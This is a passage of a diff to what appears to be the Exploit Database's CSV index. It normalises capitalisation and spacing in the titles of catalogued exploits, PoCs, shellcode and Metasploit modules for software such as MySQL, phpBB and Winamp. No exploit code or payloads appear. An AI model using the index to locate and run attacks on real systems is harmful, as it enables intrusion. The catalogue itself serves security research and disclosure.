Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem parameter' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 @@ -20306,7 +20308,7 @@ id,file,description,date,author,platform,type,port 23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit",2012-12-02,kingcope,linux,local,0 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0 -23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 +23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 @@ -20350,7 +20352,7 @@ id,file,description,date,author,platform,type,port 23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin IN_MIDI.dll Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos,0 -23125,platforms/php/webapps/23125.txt,"PHPBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 +23125,platforms/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Full Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 @@ -20393,8 +20395,8 @@ id,file,description,date,author,platform,type,port 23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0 -23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",windows,dos,0 -23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun",2003-09-23,netris,linux,dos,0 +23169,platforms/windows/dos/23169.pl,"WzdFTPD 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",windows,dos,0 +23170,platforms/linux/dos/23170.c,"ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun",2003-09-23,netris,linux,dos,0 23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption",2003-09-23,V9,linux,remote,0 23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 - SQL-GW Connection Denial of Service",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0 23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure",2003-09-24,"Phuong Nguyen",multiple,remote,0 @@ -20587,7 +20589,7 @@ id,file,description,date,author,platform,type,port 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0 -23363,platforms/php/webapps/23363.txt,"PHPBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 +23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0 23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,linux,remote,0 @@ -20688,7 +20690,7 @@ id,file,description,date,author,platform,type,port 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 -23475,platforms/php/webapps/23475.txt,"PHPBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 +23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",php,webapps,0 23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 - desc Parameter Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 23478,platforms/php/webapps/23478.txt,"Psychoblogger PB-beta1 - errormessage Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 @@ -20779,13 +20781,13 @@ id,file,description,date,author,platform,type,port 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2WIRE HomePortal Series - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 -23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",multiple,remote,0 -23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET'Arbitrary File Upload",2012-12-21,040,asp,webapps,0 +23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,asp,webapps,0 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 @@ -20839,7 +20841,7 @@ id,file,description,date,author,platform,type,port 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id parameter'SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id parameter' SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 @@ -20918,7 +20920,7 @@ id,file,description,date,author,platform,type,port 23713,platforms/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",windows,dos,0 23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos,0 -23716,platforms/windows/dos/23716.txt,"SmallFTPD 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 +23716,platforms/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 23718,platforms/php/webapps/23718.txt,"Ecommerce Corporation Online Store Kit 3.0 - shop.php cat Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 23719,platforms/php/webapps/23719.txt,"Ecommerce Corporation Online Store Kit 3.0 - shop_by_brand.php cat_manufacturer Parameter SQL Injection",2004-02-18,G00db0y,php,webapps,0 @@ -20982,8 +20984,8 @@ id,file,description,date,author,platform,type,port 23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",hardware,dos,0 23779,platforms/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",linux,dos,0 23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 - Crash (PoC)",2012-12-31,IndonesiaGokilTeam,windows,dos,0 -23781,platforms/php/webapps/23781.txt,"MyBB - 'editpost.php posthash'SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar - 'index.php date parameter'Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 +23781,platforms/php/webapps/23781.txt,"MyBB - 'editpost.php posthash' SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar - 'index.php date parameter' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 @@ -21022,9 +21024,9 @@ id,file,description,date,author,platform,type,port 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - nmimage.php z Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 -23819,platforms/php/webapps/23819.txt,"Phorum 3.x - login.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 +23819,platforms/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x - profile.php target Parameter Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 -23821,platforms/php/webapps/23821.php,"PHPBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 +23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - forumdisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - showthread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 @@ -21191,7 +21193,7 @@ id,file,description,date,author,platform,type,port 23993,platforms/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",hardware,webapps,0 -23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'Exploit",2013-01-09,"Debasish Mandal",windows,local,0 +23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0 23997,platforms/php/webapps/23997.txt,"WeBid 1.0.6 - SQL Injection",2013-01-09,"Life Wasted",php,webapps,0 24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting",2004-04-14,"Noam Rathaus",cgi,webapps,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service",2004-04-14,"Ben Rampling",windows,dos,0 @@ -21218,7 +21220,7 @@ id,file,description,date,author,platform,type,port 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 -24026,platforms/php/webapps/24026.txt,"PHPBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 +24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 24028,platforms/windows/remote/24028.pl,"Kinesphere Corporation Exchange POP3 4.0/5.0 - Remote Buffer Overflow",2004-04-20,"securma massine",windows,remote,0 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0 @@ -21458,7 +21460,7 @@ id,file,description,date,author,platform,type,port 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins - Script-Console Java Execution",2013-01-21,Metasploit,multiple,remote,0 24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution",2013-01-21,Metasploit,php,remote,0 -24274,platforms/php/webapps/24274.pl,"PHPBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 +24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation",2004-07-16,bkbll,windows,local,0 @@ -21579,7 +21581,7 @@ id,file,description,date,author,platform,type,port 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection / Directory Traversal",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 - JavaScript Denial of Service",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,windows,dos,0 -24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - page.php Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 +24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 - News.mdb Database Disclosure",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 - Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay - Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 @@ -21596,7 +21598,7 @@ id,file,description,date,author,platform,type,port 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 24411,platforms/windows/dos/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service",2004-08-25,"Next Generation Security",windows,dos,0 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service",2004-08-25,Uz4yh4N,windows,dos,0 -24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - '.wsz'Remote Code Execution",2004-07-26,anonymous,windows,remote,0 +24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - '.wsz' Remote Code Execution",2004-07-26,anonymous,windows,remote,0 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24416,platforms/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service",2004-08-30,lion,windows,dos,0 @@ -21608,11 +21610,11 @@ id,file,description,date,author,platform,type,port 24422,platforms/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",asp,webapps,0 24423,platforms/multiple/dos/24423.txt,"Cerbere Proxy Server 1.2 - Long Host Header Field Remote Denial of Service",2004-09-01,"GSS IT",multiple,dos,0 24424,platforms/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",php,webapps,0 -24425,platforms/php/webapps/24425.txt,"phpWebsite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0 +24425,platforms/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",php,webapps,0 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Microsoft Internet Explorer 8 / 9 - Steal Any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 -24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php L parameter'SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php L parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 @@ -21645,7 +21647,7 @@ id,file,description,date,author,platform,type,port 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 -24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id parameter'SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System - SQL Injection",2013-02-10,"Ramdan Yantu",php,webapps,0 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 @@ -21663,7 +21665,7 @@ id,file,description,date,author,platform,type,port 24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 -24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id parameter'SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 @@ -21676,14 +21678,14 @@ id,file,description,date,author,platform,type,port 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistant Cross-Site Scripting",2013-02-14,"cr4wl3r ",php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 -24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs'Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 +24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 -24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id parameter'SQL Injection",2013-02-17,3spi0n,php,webapps,0 +24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php id parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 24515,platforms/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,php,webapps,0 -24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter'SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 +24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter' SQL Injection",2013-02-18,"Easy Laster",php,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21805,7 +21807,7 @@ id,file,description,date,author,platform,type,port 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - a forgot_password.php userid Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 - a download_thread.php thread Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24651,platforms/php/webapps/24651.txt,"W-Agora 4.1.6 - a subscribe_thread.php HTTP Response Splitting",2004-09-30,"Alexander 